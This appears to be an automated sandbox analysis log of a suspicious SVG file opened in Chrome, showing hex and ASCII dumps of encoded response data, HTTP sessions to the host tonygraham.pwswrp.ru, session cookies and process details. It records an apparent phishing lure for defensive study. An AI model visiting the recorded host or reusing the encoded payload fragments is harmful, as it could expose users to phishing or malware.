                      2025-03-17 17:18:21 UTC1369INData Raw: 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34
                      Data Ascii: k776g776g776g44Wk776g776g776g776g776g776g44Wk776g776g776g776g776g44Wk776g44Wk776g776g776g776g776g44Wk776g44Wk44Wk776g44Wk776g776g776g776g44Wk44Wk776g776g776g44Wk776g776g44Wk44Wk776g44Wk44Wk44Wk44Wk776g44Wk44Wk44Wk776g44Wk44Wk776g776g44Wk44Wk776g776g44Wk44
                      2025-03-17 17:18:21 UTC1369INData Raw: 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36
                      Data Ascii: 44Wk44Wk776g776g44Wk776g776g44Wk44Wk776g44Wk776g44Wk44Wk776g44Wk44Wk44Wk776g776g776g44Wk776g776g776g776g776g776g776g44Wk44Wk44Wk44Wk776g44Wk776g776g44Wk776g776g776g776g776g776g44Wk776g44Wk44Wk776g44Wk44Wk776g776g776g776g44Wk776g44Wk776g776g776g44Wk776g776
                      2025-03-17 17:18:21 UTC1369INData Raw: 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b
                      Data Ascii: 76g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g44Wk44Wk44Wk44Wk776g44Wk44Wk776g776g44Wk


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.649704104.21.32.14437740C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-03-17 17:18:21 UTC1336OUTGET /favicon.ico HTTP/1.1
                      Host: tonygraham.pwswrp.ru
                      Connection: keep-alive
                      sec-ch-ua-platform: "Windows"
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                      sec-ch-ua-mobile: ?0
                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                      Sec-Fetch-Site: same-origin
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: image
                      Referer: https://tonygraham.pwswrp.ru/8T8x6LF1E/
                      Accept-Encoding: gzip, deflate, br, zstd
                      Accept-Language: en-US,en;q=0.9
                      Cookie: XSRF-TOKEN=eyJpdiI6IjFJTU9NK21wdENOYWFzVzV2cjNqWEE9PSIsInZhbHVlIjoiSVZid21IWmo0cWJrT293NVlKME1MQ0F6d3N4Q2xOYWp0TzREcGNidGdyd0phbElhMm1FUHNPQmIzb3BwL3pHUFlFWlZEYnhhcmpQSkRxdUloRmRRRkJBdnVyQy9NRVNqTHRZUUVMVnlya0VmdWMzZDh2TitmQjcxWUZqLzJERU4iLCJtYWMiOiI0YzJmN2EwYzgwODUxYTMzNDhjMTBmZmE3N2JhZjI0ZDQyNWYyYjg3YTkwYzU1ZmEwYWI1ZjUyNTlmOGEyOGU1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImVCRzFMaVBrSEJaMWlvOTNyMXhGcnc9PSIsInZhbHVlIjoiZUR3dlJlcFB4SWFYNnkzaU1mYmMyVnlwdmJUNCtWS3E0QWVWc0tMRjdOc3NyTExhZkxBejE2OW03MmRpcHFkRUV5dWpUcXdnSEx1dkNQUUtSSE1NYzc1WEhmbWdDcHRRYWlrTzdWSmp1VkVkcUxRa0hvNE45bG9ya2tQOUtBYWciLCJtYWMiOiJlYzQxODdhNDkwMjIzZjY1MGI2OTY5Y2NmYWEyMDMxYTZiMGNjYzQwZTAzYjRlNDk2OWYxYzU1OTdhZGNjYzU0IiwidGFnIjoiIn0%3D
                      2025-03-17 17:18:22 UTC844INHTTP/1.1 404 Not Found
                      Date: Mon, 17 Mar 2025 17:18:22 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Server: cloudflare
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nl%2BJeCS3dkb8Dff3IbH9YTD8fPx1d19BRmmJvN3eH0WTCo%2BpZ9qE35kkki8XMmdrDxXaTwBGr5CK0QkZQJjGXJPpNKWMLmpGidCObFOh%2BeHDDWUP8XASbUGApZ%2BPASX5k1hN"}],"group":"cf-nel","max_age":604800}
                      Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Vary: Accept-Encoding
                      Server-Timing: cfL4;desc="?proto=TCP&rtt=1110&min_rtt=1096&rtt_var=439&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=2245&delivery_rate=2397350&cwnd=251&unsent_bytes=0&cid=9b7795a91c0410be&ts=80&x=0"
                      Cache-Control: max-age=14400
                      Cf-Cache-Status: MISS
                      CF-RAY: 921e2629fa5e8d3f-EWR
                      alt-svc: h3=":443"; ma=86400
                      2025-03-17 17:18:22 UTC5INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.64970635.190.80.14437740C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-03-17 17:18:22 UTC547OUTOPTIONS /report/v4?s=Nl%2BJeCS3dkb8Dff3IbH9YTD8fPx1d19BRmmJvN3eH0WTCo%2BpZ9qE35kkki8XMmdrDxXaTwBGr5CK0QkZQJjGXJPpNKWMLmpGidCObFOh%2BeHDDWUP8XASbUGApZ%2BPASX5k1hN HTTP/1.1
                      Host: a.nel.cloudflare.com
                      Connection: keep-alive
                      Origin: https://tonygraham.pwswrp.ru
                      Access-Control-Request-Method: POST
                      Access-Control-Request-Headers: content-type
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br, zstd
                      Accept-Language: en-US,en;q=0.9
                      2025-03-17 17:18:22 UTC336INHTTP/1.1 200 OK
                      Content-Length: 0
                      access-control-max-age: 86400
                      access-control-allow-methods: POST, OPTIONS
                      access-control-allow-origin: *
                      access-control-allow-headers: content-length, content-type
                      date: Mon, 17 Mar 2025 17:18:22 GMT
                      Via: 1.1 google
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.64970735.190.80.14437740C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-03-17 17:18:23 UTC522OUTPOST /report/v4?s=Nl%2BJeCS3dkb8Dff3IbH9YTD8fPx1d19BRmmJvN3eH0WTCo%2BpZ9qE35kkki8XMmdrDxXaTwBGr5CK0QkZQJjGXJPpNKWMLmpGidCObFOh%2BeHDDWUP8XASbUGApZ%2BPASX5k1hN HTTP/1.1
                      Host: a.nel.cloudflare.com
                      Connection: keep-alive
                      Content-Length: 438
                      Content-Type: application/reports+json
                      Origin: https://tonygraham.pwswrp.ru
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br, zstd
                      Accept-Language: en-US,en;q=0.9
                      2025-03-17 17:18:23 UTC438OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 34 32 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 74 6f 6e 79 67 72 61 68 61 6d 2e 70 77 73 77 72 70 2e 72 75 2f 38 54 38 78 36 4c 46 31 45 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 33 32 2e 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65
                      Data Ascii: [{"age":0,"body":{"elapsed_time":426,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://tonygraham.pwswrp.ru/8T8x6LF1E/","sampling_fraction":1.0,"server_ip":"104.21.32.1","status_code":404,"type":"http.error"},"type":"network-e
                      2025-03-17 17:18:23 UTC214INHTTP/1.1 200 OK
                      Content-Length: 0
                      access-control-allow-origin: *
                      vary: Origin
                      date: Mon, 17 Mar 2025 17:18:23 GMT
                      Via: 1.1 google
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close


                      Click to jump to process

                      Click to jump to process

                      Click to jump to process

                      Target ID:0
                      Start time:13:18:10
                      Start date:17/03/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                      Imagebase:0x7ff63b000000
                      File size:3'388'000 bytes
                      MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Target ID:1
                      Start time:13:18:11
                      Start date:17/03/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1924,i,10494982236509602108,7760536900289131602,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2092 /prefetch:3
                      Imagebase:0x7ff63b000000
                      File size:3'388'000 bytes
                      MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Target ID:5
                      Start time:13:18:18
                      Start date:17/03/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\3661627172.svg"
                      Imagebase:0x7ff63b000000
                      File size:3'388'000 bytes
                      MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      No disassembly